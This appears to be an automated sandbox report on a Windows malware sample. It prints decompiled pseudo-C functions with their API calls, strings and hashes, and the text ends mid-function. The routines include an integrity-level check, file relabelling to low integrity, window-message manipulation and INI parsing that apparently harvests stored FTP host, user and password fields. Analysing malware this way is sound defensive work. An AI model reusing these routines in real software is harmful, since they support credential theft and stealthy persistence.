Instruction ID: 9fae522ab24e864a6ecf1725ba9aa54ca90a210a817ea25853a11c88e25380f5
Opcode Fuzzy Hash: 50779079251e561cf9c7c8349911c5d865ba7c7cf1d13a1133d9eb47232162b2
Instruction Fuzzy Hash: 9F21AC32D40218BBEF209BA19D05FDF7BBDAB84750F1040A6B900F31A0D779AE45DAA5

Uniqueness

Uniqueness Score: -1.00%

Function 00413115, Relevance: 10.6, APIs: 7, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00413115(void* __ecx) {
				long _v8;
				void* _v12;
				char* _t21;
				signed char _t22;
				DWORD* _t25;
				void* _t32;

				_t28 = 0;
				if(OpenProcessToken(0xffffffff, 8,  &_v12) == 0) {
					L14:
					return _t28;
				}
				if(GetTokenInformation(_v12, 0x19, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L13:
					CloseHandle(_v12);
					goto L14;
				} else {
					_t32 = E00411991(_v8);
					if(_t32 == 0) {
						L12:
						goto L13;
					}
					if(GetTokenInformation(_v12, 0x19, _t32, _v8,  &_v8) != 0) {
						_t21 = GetSidSubAuthorityCount( *_t32);
						if(_t21 != 0) {
							_t22 =  *_t21;
							if(_t22 > 0) {
								_t25 = GetSidSubAuthority( *_t32, (_t22 & 0x000000ff) - 1);
								if(_t25 != 0) {
									if( *_t25 >= 0x2000) {
										asm("sbb bl, bl");
										_t28 = 3;
									} else {
										_t28 = 1;
									}
								}
							}
						}
					}
					E004119C1(_t32);
					goto L12;
				}
			}

0x00413123
0x0041312d
0x004131c3
0x004131c7
0x004131c7
0x00413149
0x004131b9
0x004131bc
0x00000000
0x00413156
0x0041315f
0x00413163
0x004131b8
0x00000000
0x004131b8
0x00413176
0x0041317a
0x00413182
0x00413184
0x00413188
0x00413191
0x00413199
0x004131a2
0x004131ad
0x004131af
0x004131a4
0x004131a4
0x004131a4
0x004131a2
0x00413199
0x00413188
0x00413182
0x004131b3
0x00000000
0x004131b3

APIs

OpenProcessToken.ADVAPI32(000000FF,00000008,?,00000000,?,?,?,00405C4E,00000000,00406128,?,?,00000000), ref: 00413125
GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,00000000,00000000,75144EE0,?,?,?,00405C4E,00000000,00406128,?,?,00000000), ref: 00413145
GetLastError.KERNEL32(?,?,?,00405C4E,00000000,00406128,?,?,00000000), ref: 0041314B
GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?,?,?,00405C4E,00000000,00406128,?,?,00000000), ref: 00413172
GetSidSubAuthorityCount.ADVAPI32(00000000,?,?,?,00405C4E,00000000,00406128,?,?,00000000), ref: 0041317A
GetSidSubAuthority.ADVAPI32(00000000,?,?,?,?,00405C4E,00000000,00406128,?,?,00000000), ref: 00413191
CloseHandle.KERNEL32(?,?,?,?,00405C4E,00000000,00406128,?,?,00000000), ref: 004131BC

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Token$AuthorityInformation$CloseCountErrorHandleLastOpenProcess
String ID:
API String ID: 3714493844-0
Opcode ID: 8e5feec0317939b35c32eaaf485a17ff5ccc2a9711f792394a86efa33b69d241
Instruction ID: 1252fea863ed61440a813894d2ba782221bc3edd722287188d7490a8aaaf3a04
Opcode Fuzzy Hash: 8e5feec0317939b35c32eaaf485a17ff5ccc2a9711f792394a86efa33b69d241
Instruction Fuzzy Hash: A9118E76500048BFEB105FA0DD84EEE3B7EEB05341F1804A6F541E6264D7399FCAAB68

Uniqueness

Uniqueness Score: -1.00%

Function 00415EDB, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00415EDB(short* _a4) {
				char _v5;
				int _v12;
				void* _v16;
				void* _v20;
				int _v24;
				long _t18;

				_v5 = 0;
				_t18 = RegCreateKeyExW(0x80000001, L"SOFTWARE\\Microsoft", 0, 0, 0, 4, 0,  &_v16, 0);
				_t33 = _t18;
				if(_t18 == 0) {
					_v12 = 0;
					do {
						E00415D40(6, 4, _t33, 2, _a4);
						if(RegCreateKeyExW(_v16, _a4, 0, 0, 0, 3, 0,  &_v20,  &_v24) != 0) {
							goto L4;
						} else {
							RegCloseKey(_v20);
							if(_v24 == 1) {
								_v5 = 1;
							} else {
								goto L4;
							}
						}
						L7:
						RegCloseKey(_v16);
						goto L8;
						L4:
						_v12 = _v12 + 1;
					} while (_v12 < 0x64);
					goto L7;
				}
				L8:
				return _v5;
			}

0x00415f00
0x00415f03
0x00415f05
0x00415f07
0x00415f10
0x00415f13
0x00415f1c
0x00415f39
0x00000000
0x00415f3b
0x00415f3e
0x00415f44
0x00415f51
0x00000000
0x00000000
0x00000000
0x00415f44
0x00415f55
0x00415f58
0x00000000
0x00415f46
0x00415f46
0x00415f49
0x00000000
0x00415f4f
0x00415f5b
0x00415f61

APIs

RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 00415F03

Part of subcall function 00415D40: CharUpperW.USER32(00000000,?,.exe,00000000,00000000), ref: 00415E61

RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00000003,00000000,?,?,00000002,?), ref: 00415F35
RegCloseKey.ADVAPI32(?), ref: 00415F3E
RegCloseKey.ADVAPI32(?), ref: 00415F58

Strings

d, xrefs: 00415F49
SOFTWARE\Microsoft, xrefs: 00415EF6

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreate$CharUpper
String ID: SOFTWARE\Microsoft$d
API String ID: 1794619670-1227932965
Opcode ID: 1b945b6785a0340042813f9f4e3ccb090da9db43e6af1e3be1ce8049c93ad776
Instruction ID: 57cfeeb4bbbfe6b278825c05152b457a591863e3a8ff1f1037bc0623e8b41536
Opcode Fuzzy Hash: 1b945b6785a0340042813f9f4e3ccb090da9db43e6af1e3be1ce8049c93ad776
Instruction Fuzzy Hash: F7116DB190420CFEEB119B94DD80EFFBBBCEB54388F104066FA01B6161D2759E868B75

Uniqueness

Uniqueness Score: -1.00%

Function 0040AE98, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AE98(WCHAR* __ebx, void* __ecx, char _a4) {
				void* __edi;
				long _t3;
				WCHAR* _t13;

				_t13 = __ebx;
				if( *0x422a70 == 0) {
					E0040666E(__ecx, 0x422a70, 2);
					 *((short*)(E004119FD(0x422c78, 0x422a70, E00412510(0x422a70) + _t10) + 0x422c78)) = 0;
					_t3 = PathRemoveFileSpecW(0x422c78);
				}
				if(_t13 != 0) {
					E00411D62(_t3 | 0xffffffff, 0x422a70, _t13);
					_t3 = PathRenameExtensionW(_t13, L".tmp");
				}
				if(_a4 != 0 &&  *0x42279c > 1) {
					E00416FC8(0x422c78);
					E00415042(0x422c78);
					_t3 = GetFileAttributesW(0x422a70);
					if(_t3 != 0xffffffff) {
						return E00415042(0x422a70);
					}
				}
				return _t3;
			}

0x0040ae98
0x0040aeac
0x0040aeb0
0x0040aec9
0x0040aed0
0x0040aed0
0x0040aed8
0x0040aee1
0x0040aeec
0x0040aeec
0x0040aef7
0x0040af03
0x0040af09
0x0040af0f
0x0040af18
0x00000000
0x0040af1b
0x0040af18
0x0040af22

APIs

PathRemoveFileSpecW.SHLWAPI(00422C78,00422C78,00422A70,00000000,00000002,00000000,00020000,0040B992,00000001,?,8793AEF2,00000002,00002723,00020000,?,00002722), ref: 0040AED0
PathRenameExtensionW.SHLWAPI(00000000,.tmp,00000000,00020000,0040B992,00000001,?,8793AEF2,00000002,00002723,00020000,?,00002722,00020000,00000001,?), ref: 0040AEEC
GetFileAttributesW.KERNEL32(00422A70,00422C78,00422C78,00000000,00020000,0040B992,00000001,?,8793AEF2,00000002,00002723,00020000,?,00002722,00020000,00000001), ref: 0040AF0F

Part of subcall function 0040666E: PathRenameExtensionW.SHLWAPI(?,.dat,?,00422590,00000000,00000032,?,77A19EB0,00000000), ref: 004066E7

Strings

p*B, xrefs: 0040AEA2
.tmp, xrefs: 0040AEE6
x,B, xrefs: 0040AEA7

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Path$ExtensionFileRename$AttributesRemoveSpec
String ID: .tmp$p*B$x,B
API String ID: 3627892477-3516233856
Opcode ID: 1c9e69087c3751f3fa60162d53a5b02ba895a09164c93f05d6bb019f03c9f947
Instruction ID: 6f33a774a54f4f11c4d66001c6319bbb00c3cd0d6b002a74c489e92638f2621d
Opcode Fuzzy Hash: 1c9e69087c3751f3fa60162d53a5b02ba895a09164c93f05d6bb019f03c9f947
Instruction Fuzzy Hash: 17F0AD71B0421035E2203736AC4AABF29598F92728F44867FF021B11E2CFBC4C92826E

Uniqueness

Uniqueness Score: -1.00%

Function 00415042, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00415042(intOrPtr _a4) {
				struct _ACL* _v8;
				struct _SECURITY_DESCRIPTOR* _v12;
				int _v16;
				int _v20;
				void** _t11;
				int _t16;
				struct _ACL* _t18;

				_t18 = 0;
				E0041308D(L"SeSecurityPrivilege");
				_t11 =  &_v12;
				__imp__ConvertStringSecurityDescriptorToSecurityDescriptorW(L"S:(ML;CIOI;NRNWNX;;;LW)", 1, _t11, 0);
				if(_t11 != 0) {
					_v8 = 0;
					_t16 = GetSecurityDescriptorSacl(_v12,  &_v20,  &_v8,  &_v16);
					if(_t16 != 0) {
						__imp__SetNamedSecurityInfoW(_a4, 1, 0x10, 0, 0, 0, _v8);
						if(_t16 == 0) {
							_t18 = 1;
						}
					}
					LocalFree(_v12);
				}
				return _t18;
			}

0x0041504e
0x00415050
0x00415056
0x00415061
0x00415069
0x0041507a
0x0041507d
0x00415085
0x00415094
0x0041509c
0x0041509e
0x0041509e
0x0041509c
0x004150a3
0x004150a3
0x004150ad

APIs

Part of subcall function 0041308D: GetCurrentThread.KERNEL32 ref: 0041309D
Part of subcall function 0041308D: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0041C599,SeTcbPrivilege), ref: 004130A4
Part of subcall function 0041308D: OpenProcessToken.ADVAPI32(000000FF,00000020,0041C599,?,?,?,?,0041C599,SeTcbPrivilege), ref: 004130B6

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;CIOI;NRNWNX;;;LW),00000001,00000000,00000000), ref: 00415061
GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,00000000), ref: 0041507D
SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,?), ref: 00415094
LocalFree.KERNEL32(00000000), ref: 004150A3

Strings

SeSecurityPrivilege, xrefs: 00415049
S:(ML;CIOI;NRNWNX;;;LW), xrefs: 0041505C

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Security$Descriptor$OpenThreadToken$ConvertCurrentFreeInfoLocalNamedProcessSaclString
String ID: S:(ML;CIOI;NRNWNX;;;LW)$SeSecurityPrivilege
API String ID: 3555451682-1937014404
Opcode ID: b7034957f4b360ddc47b122f38c3a6483de68978fec94b95b28f8777ae4260a0
Instruction ID: 3086d2c10367922c049588a3464c6c2a4d30f3ee716e3989c2044df014a0aeec
Opcode Fuzzy Hash: b7034957f4b360ddc47b122f38c3a6483de68978fec94b95b28f8777ae4260a0
Instruction Fuzzy Hash: D2011DB564020CFFEB119FE18D85FEF7BBCAB04744F004466B501F11A1D6B69A949A68

Uniqueness

Uniqueness Score: -1.00%

Function 004084BE, Relevance: 9.2, APIs: 6, Instructions: 197
windowthreadtimeCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E004084BE(void* __eax, signed int __ecx, struct HWND__* _a4, signed int _a8, signed int _a12, signed short _a16, signed int _a20, intOrPtr _a24, intOrPtr _a28) {
				long _v8;
				void* __ebx;
				void* __esi;
				signed int _t47;
				signed short _t58;
				int _t65;
				signed int _t66;
				signed short _t75;
				void* _t79;

				_t70 = __ecx;
				_push(__ecx);
				_t75 = _a16;
				_t79 = __eax;
				if(_t75 == 0x201 || _t75 == 0x207 || _t75 == 0x204) {
					_t65 = GetAncestor(_a4, 2);
					if(_t65 ==  *(_t79 + 0x170)) {
						goto L8;
					}
					_t70 = _a12 & 0x0000ffff;
					_t47 = SendMessageTimeoutW(_a4, 0x21, _t65, (_t75 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff, 2, 0x64,  &_v8);
					if(_t47 == 0 || _v8 != 2 && _v8 != 4) {
						 *(_t79 + 0x170) = _t65;
						goto L8;
					} else {
						goto L35;
					}
				} else {
					L8:
					_t66 = _a12 & 0x0000ffff;
					_v8 = _t66;
					PostMessageW(_a4, 0x20, _a4, (_t75 & 0x0000ffff) << 0x00000010 | _t66);
					if(_a12 != 1) {
						_t47 = E004083DF(_t70, _t79, _a4, _a20);
						_a20 = _t47;
						__eflags = _t66 - 8;
						if(__eflags > 0) {
							__eflags = _t66 - 9;
							if(__eflags == 0) {
								__eflags = _t47 - 0xa2;
								if(_t47 != 0xa2) {
									__eflags = _t47 - 0xa5;
									if(_t47 != 0xa5) {
										L35:
										return _t47;
									}
									_t47 = 0xffff;
									L59:
									__eflags = _t47;
									if(_t47 == 0) {
										goto L35;
									}
									__eflags = _t47 - 0xffff;
									if(_t47 != 0xffff) {
										L33:
										_push(_a28);
										_push(_t47 & 0x0000ffff);
										_push(0x112);
										L34:
										_t47 = PostMessageW(_a4, ??, ??, ??);
										goto L35;
									}
									L61:
									_push(_a28);
									_push(_a4);
									_push(0x7b);
									goto L34;
								}
								_t47 =  *(_a8 + 0x24);
								__eflags = _t47 & 0x00010000;
								if((_t47 & 0x00010000) == 0) {
									goto L35;
								}
								asm("sbb eax, eax");
								_t47 = ( ~(_t47 & 0x01000000) & 0x000000f0) + 0x0000f030 & 0x0000ffff;
								goto L59;
							}
							if(__eflags <= 0) {
								L25:
								_push(_a28);
								_push(_t66);
								L10:
								_push(_t47);
								goto L34;
							}
							__eflags = _t66 - 0x11;
							if(_t66 <= 0x11) {
								L40:
								__eflags = _t47 - 0xa1;
								if(_t47 == 0xa1) {
									_t47 = E0040824F(_a4, _t79, GetWindowThreadProcessId(_a4, 0), _a12, 1);
								}
								goto L35;
							}
							__eflags = _t66 - 0x14;
							if(_t66 == 0x14) {
								__eflags = _t47 - 0xa2;
								if(_t47 != 0xa2) {
									L21:
									__eflags = _t47 - 0xa5;
									L22:
									if(__eflags != 0) {
										goto L35;
									}
									goto L61;
								}
								L32:
								_t47 = 0xf060;
								goto L33;
							}
							__eflags = _t66 - 0x15;
							if(_t66 != 0x15) {
								goto L25;
							}
							__eflags = _t47 - 0xa2;
							if(_t47 != 0xa2) {
								goto L21;
							}
							_t47 = 0xf180;
							goto L33;
						}
						if(__eflags == 0) {
							__eflags = _t47 - 0xa2;
							if(_t47 != 0xa2) {
								goto L21;
							}
							_t47 = _a8;
							__eflags =  *(_t47 + 0x24) & 0x00020000;
							if(( *(_t47 + 0x24) & 0x00020000) == 0) {
								goto L35;
							}
							_t47 = 0xf020;
							goto L33;
						}
						__eflags = _t66 - 2;
						if(_t66 == 2) {
							__eflags = _t47 - 0xa3;
							if(_t47 == 0xa3) {
								goto L25;
							}
							__eflags = _t47 - 0xa5;
							if(_t47 == 0xa5) {
								goto L61;
							}
							goto L40;
						}
						__eflags = _t66 - 3;
						if(_t66 == 3) {
							__eflags = _t47 - 0xa3;
							if(_t47 != 0xa3) {
								__eflags = _t47 - 0xa5;
								if(_t47 == 0xa5) {
									goto L61;
								}
								__eflags = _t47 - 0xa1;
								goto L22;
							}
							goto L32;
						}
						__eflags = _t66 - 5;
						if(_t66 == 5) {
							__eflags = _t47 - 0xa1;
							if(_t47 != 0xa1) {
								__eflags = _t47 - 0xa0;
								if(_t47 != 0xa0) {
									goto L35;
								}
								_push(0);
								_push(0xfffffffe);
								L28:
								_push( *((intOrPtr*)(_t79 + 8)));
								goto L34;
							}
							_push(0);
							_push(0xffffffff);
							goto L28;
						}
						__eflags = _t66 - 6 - 1;
						if(_t66 - 6 > 1) {
							goto L25;
						}
						__eflags = _t47 - 0xa1;
						if(_t47 == 0xa1) {
							E0040824F(_a4, _t79, GetWindowThreadProcessId(_a4, 0), 0, 1);
							_t47 = _a20;
							_t66 = _v8;
							goto L25;
						}
						__eflags = _t47 - 0xa2;
						if(_t47 == 0xa2) {
							goto L25;
						}
						__eflags = _t47 - 0xa3;
						if(_t47 == 0xa3) {
							goto L25;
						}
						__eflags = _t47 - 0xa0;
						if(_t47 == 0xa0) {
							goto L25;
						}
						goto L21;
					}
					_t58 = E0041AA9C(0, _t79, 0);
					_push(_a24);
					_push(_t58 & 0x0000ffff);
					_t47 = E004083DF(_t79, _t79, _a4, _a16);
					goto L10;
				}
			}

0x004084be
0x004084c1
0x004084c5
0x004084c8
0x004084d0
0x004084ed
0x004084f5
0x00000000
0x00000000
0x004084f7
0x00408512
0x0040851a
0x00408530
0x00000000
0x00000000
0x00000000
0x00000000
0x00408536
0x00408536
0x00408536
0x0040854c
0x00408554
0x0040855b
0x00408586
0x0040858b
0x0040858e
0x00408591
0x004086a8
0x004086ab
0x004086f0
0x004086f5
0x00408720
0x00408725
0x0040863f
0x00408643
0x00408643
0x0040872b
0x0040872d
0x0040872d
0x00408730
0x00000000
0x00000000
0x00408736
0x00408739
0x0040862e
0x0040862e
0x00408634
0x00408635
0x0040863a
0x0040863d
0x00000000
0x0040863d
0x0040873f
0x0040873f
0x00408742
0x00408745
0x00000000
0x00408745
0x004086fa
0x004086fd
0x00408702
0x00000000
0x00000000
0x0040870f
0x0040871b
0x00000000
0x0040871b
0x004086ad
0x004085fc
0x004085fc
0x004085ff
0x0040857a
0x0040857a
0x00000000
0x0040857a
0x004086b3
0x004086b6
0x0040866a
0x0040866a
0x0040866f
0x00408683
0x00408683
0x00000000
0x0040866f
0x004086b8
0x004086bb
0x004086db
0x004086e0
0x004085d4
0x004085d4
0x004085d9
0x004085d9
0x00000000
0x00000000
0x00000000
0x004085db
0x00408629
0x00408629
0x00000000
0x00408629
0x004086bd
0x004086c0
0x00000000
0x00000000
0x004086c6
0x004086cb
0x00000000
0x00000000
0x004086d1
0x00000000
0x004086d1
0x00408597
0x0040868a
0x0040868f
0x00000000
0x00000000
0x00408695
0x00408698
0x0040869f
0x00000000
0x00000000
0x004086a1
0x00000000
0x004086a1
0x0040859d
0x004085a0
0x00408658
0x0040865d
0x00000000
0x00000000
0x0040865f
0x00408664
0x00000000
0x00000000
0x00000000
0x00408664
0x004085a6
0x004085a9
0x00408622
0x00408627
0x00408646
0x0040864b
0x00000000
0x00000000
0x00408651
0x00000000
0x00408651
0x00000000
0x00408627
0x004085ab
0x004085ae
0x00408605
0x0040860a
0x00408615
0x0040861a
0x00000000
0x00000000
0x0040861c
0x0040861e
0x00408610
0x00408610
0x00000000
0x00408610
0x0040860c
0x0040860e
0x00000000
0x0040860e
0x004085b3
0x004085b6
0x00000000
0x00000000
0x004085b8
0x004085bd
0x004085f1
0x004085f6
0x004085f9
0x00000000
0x004085f9
0x004085bf
0x004085c4
0x00000000
0x00000000
0x004085c6
0x004085cb
0x00000000
0x00000000
0x004085cd
0x004085d2
0x00000000
0x00000000
0x00000000
0x004085d2
0x00408563
0x00408568
0x0040856e
0x00408575
0x00000000
0x00408575

APIs

GetAncestor.USER32(?,00000002), ref: 004084E7
SendMessageTimeoutW.USER32 ref: 00408512
PostMessageW.USER32(?,00000020,?,00000000), ref: 00408554
GetWindowThreadProcessId.USER32(?,00000000), ref: 004085EA
PostMessageW.USER32(?,00000112,?,?), ref: 0040863D
GetWindowThreadProcessId.USER32(?,00000000), ref: 0040867C

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$PostProcessThreadWindow$AncestorSendTimeout
String ID:
API String ID: 1223205383-0
Opcode ID: 51a72d6c581778da24983603807bf5d1c281b7b4912517c2fe85e87477d58076
Instruction ID: 5709bc8453ff45ba8f042624d161fdb7cd2d968acf725209ee55610a2e3e96b1
Opcode Fuzzy Hash: 51a72d6c581778da24983603807bf5d1c281b7b4912517c2fe85e87477d58076
Instruction Fuzzy Hash: 13518070600219AAEF304A14CF85BBF3654E715394F25083FF9C1B62E1CE7ECD91AA5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040E41C, Relevance: 9.2, APIs: 6, Instructions: 175
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0040E41C(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
				short _v524;
				short _v528;
				char _v568;
				short _v584;
				char _v596;
				short _v600;
				char _v608;
				short _v612;
				char _v616;
				short _v620;
				char _v624;
				short _v628;
				short* _v632;
				WCHAR* _v636;
				WCHAR* _v640;
				WCHAR* _v644;
				WCHAR* _v648;
				WCHAR* _v652;
				void* __edi;
				void* __esi;
				WCHAR* _t54;
				WCHAR* _t57;
				void* _t61;
				void* _t63;
				void* _t65;
				void* _t67;
				void* _t69;
				WCHAR* _t72;
				WCHAR* _t74;
				long _t78;
				int _t81;
				long _t85;
				long _t88;
				WCHAR* _t89;
				void* _t90;
				WCHAR* _t94;
				WCHAR* _t95;
				WCHAR* _t111;
				WCHAR* _t112;
				WCHAR* _t117;
				intOrPtr _t126;
				signed int _t127;
				void* _t129;

				_t129 = (_t127 & 0xfffffff8) - 0x284;
				if(E00417246( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
					L21:
					return 1;
				}
				_t132 =  *__edx & 0x00000010;
				if(( *__edx & 0x00000010) == 0) {
					_t117 = E00411991(0x1fffe);
					_v628 = _t117;
					__eflags = _t117;
					if(_t117 == 0) {
						goto L21;
					}
					_t54 = GetPrivateProfileStringW(0, 0, 0, _t117, 0xffff,  &_v524);
					__eflags = _t54;
					if(_t54 <= 0) {
						L20:
						E004119C1(_t117);
						goto L21;
					}
					_t9 =  &(_t54[0]); // 0x1
					_t57 = E00412871(_t117, _t9);
					__eflags = _t57;
					if(_t57 == 0) {
						goto L20;
					}
					_t111 = E00411991(0xc1c);
					_v640 = _t111;
					__eflags = _t111;
					if(_t111 != 0) {
						_t11 =  &(_t111[0x2fd]); // 0x5fa
						_v632 = _t11;
						_v644 = _t117;
						_t61 = 0x72;
						E00419DD3(_t61,  &_v584);
						_t63 = 0x73;
						E00419DD3(_t63,  &_v596);
						_t65 = 0x74;
						E00419DD3(_t65,  &_v608);
						_t67 = 0x75;
						E00419DD3(_t67,  &_v624);
						_t69 = 0x76;
						E00419DD3(_t69,  &_v616);
						goto L9;
						L18:
						_t74 = E004128AD(_v648, 1);
						_v652 = _t74;
						__eflags = _t74;
						if(_t74 != 0) {
							_t111 = _v644;
							L9:
							_t72 = StrStrIW(_v644,  &_v584);
							__eflags = _t72;
							if(_t72 == 0) {
								_t78 = GetPrivateProfileStringW(_v648,  &_v600, 0, _t111, 0xff,  &_v528);
								__eflags = _t78;
								if(_t78 != 0) {
									_t81 = GetPrivateProfileIntW(_v648,  &_v612, 0x15,  &_v528);
									_v640 = _t81;
									__eflags = _t81 - 1 - 0xfffe;
									if(_t81 - 1 <= 0xfffe) {
										_t112 =  &(_t111[0xff]);
										_t85 = GetPrivateProfileStringW(_v648,  &_v628, 0, _t112, 0xff,  &_v528);
										__eflags = _t85;
										if(_t85 != 0) {
											_t33 =  &(_t112[0xff]); // 0x0
											_t124 = _t33;
											_t88 = GetPrivateProfileStringW(_v648,  &_v620, 0, _t33, 0xff,  &_v528);
											__eflags = _t88;
											if(_t88 != 0) {
												_t89 = E00412510(_t124);
												__eflags = _t89;
												if(_t89 > 0) {
													_t125 =  &_v568;
													_t90 = 0x55;
													E00419DD3(_t90,  &_v568);
													_push(_v640);
													_t38 =  &(_t112[0xff]); // 0x0
													_push(_v644);
													_push(_t112);
													_t113 = _v636;
													_t94 = E004126B4(_t125, 0x311, _v636, _t125);
													_t129 = _t129 + 0x14;
													__eflags = _t94;
													if(_t94 > 0) {
														_t126 = _a4;
														_t95 = E00411DB5(_t94, _t126, _t113);
														__eflags = _t95;
														if(_t95 != 0) {
															_t42 = _t126 + 4;
															 *_t42 =  &(( *(_t126 + 4))[0]);
															__eflags =  *_t42;
														}
													}
												}
											}
										}
									}
								}
							}
							goto L18;
						}
						E004119C1(_v644);
						_t117 = _v636;
					}
					goto L20;
				} else {
					E0040E3E4(_t132,  &_v524, _a4);
					goto L21;
				}
			}

0x0040e422
0x0040e440
0x0040e636
0x0040e63e
0x0040e63e
0x0040e446
0x0040e449
0x0040e46a
0x0040e46e
0x0040e472
0x0040e474
0x00000000
0x00000000
0x0040e491
0x0040e493
0x0040e495
0x0040e630
0x0040e631
0x00000000
0x0040e631
0x0040e49b
0x0040e4a0
0x0040e4a5
0x0040e4a7
0x00000000
0x00000000
0x0040e4b7
0x0040e4b9
0x0040e4bd
0x0040e4bf
0x0040e4c5
0x0040e4cd
0x0040e4d1
0x0040e4d9
0x0040e4da
0x0040e4e5
0x0040e4e6
0x0040e4f1
0x0040e4f2
0x0040e4fd
0x0040e4fe
0x0040e509
0x0040e50a
0x0040e50f
0x0040e60c
0x0040e612
0x0040e617
0x0040e61b
0x0040e61d
0x0040e511
0x0040e515
0x0040e51e
0x0040e524
0x0040e526
0x0040e546
0x0040e548
0x0040e54a
0x0040e563
0x0040e569
0x0040e56e
0x0040e573
0x0040e582
0x0040e594
0x0040e596
0x0040e598
0x0040e5a3
0x0040e5a3
0x0040e5b5
0x0040e5b7
0x0040e5b9
0x0040e5bd
0x0040e5c2
0x0040e5c4
0x0040e5c8
0x0040e5cc
0x0040e5cd
0x0040e5d2
0x0040e5d6
0x0040e5dc
0x0040e5e6
0x0040e5e7
0x0040e5ee
0x0040e5f3
0x0040e5f6
0x0040e5f8
0x0040e5fa
0x0040e600
0x0040e605
0x0040e607
0x0040e609
0x0040e609
0x0040e609
0x0040e609
0x0040e607
0x0040e5f8
0x0040e5c4
0x0040e5b9
0x0040e598
0x0040e573
0x0040e54a
0x00000000
0x0040e526
0x0040e627
0x0040e62c
0x0040e62c
0x00000000
0x0040e44b
0x0040e456
0x00000000
0x0040e456

APIs

Part of subcall function 00417246: PathCombineW.SHLWAPI(00405D8B,00405D8B,?,00405D8B,?,?), ref: 00417265

GetPrivateProfileStringW.KERNEL32 ref: 0040E491
StrStrIW.SHLWAPI(?,?), ref: 0040E51E
GetPrivateProfileStringW.KERNEL32 ref: 0040E546
GetPrivateProfileIntW.KERNEL32 ref: 0040E563
GetPrivateProfileStringW.KERNEL32 ref: 0040E594

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfile$String$CombinePath
String ID:
API String ID: 2134968610-0
Opcode ID: 4bf4ce7fce0d279e9b10b00793456ad319a72ea8c2b233add67477e352d3dc95
Instruction ID: 5f88bd31cda2e218dc08945d56e75d8ef53380b3487903d03b8cf705e3b5cea8
Opcode Fuzzy Hash: 4bf4ce7fce0d279e9b10b00793456ad319a72ea8c2b233add67477e352d3dc95
Instruction Fuzzy Hash: 3451B272504302ABD620DB62DC45EEBB7E8AF84704F400D2AF984E3291DB39D95587AA

Uniqueness

Uniqueness Score: -1.00%

Function 0041BA86, Relevance: 9.2, APIs: 6, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041BA86(void* __eflags, char* _a4, struct _GOPHER_FIND_DATAA _a8, void _a12, struct _GOPHER_FIND_DATAA _a16) {
				char _v5;
				char _v12;
				signed int _v16;
				char _v20;
				char _v24;
				long _v28;
				void* __edi;
				void* __esi;
				signed int _t55;
				void* _t58;
				struct _GOPHER_FIND_DATAA _t59;
				intOrPtr _t60;
				struct _GOPHER_FIND_DATAA _t61;
				struct _GOPHER_FIND_DATAA _t62;
				signed int _t71;
				struct _GOPHER_FIND_DATAA _t79;
				struct _GOPHER_FIND_DATAA _t84;
				int _t89;
				struct _GOPHER_FIND_DATAA _t91;
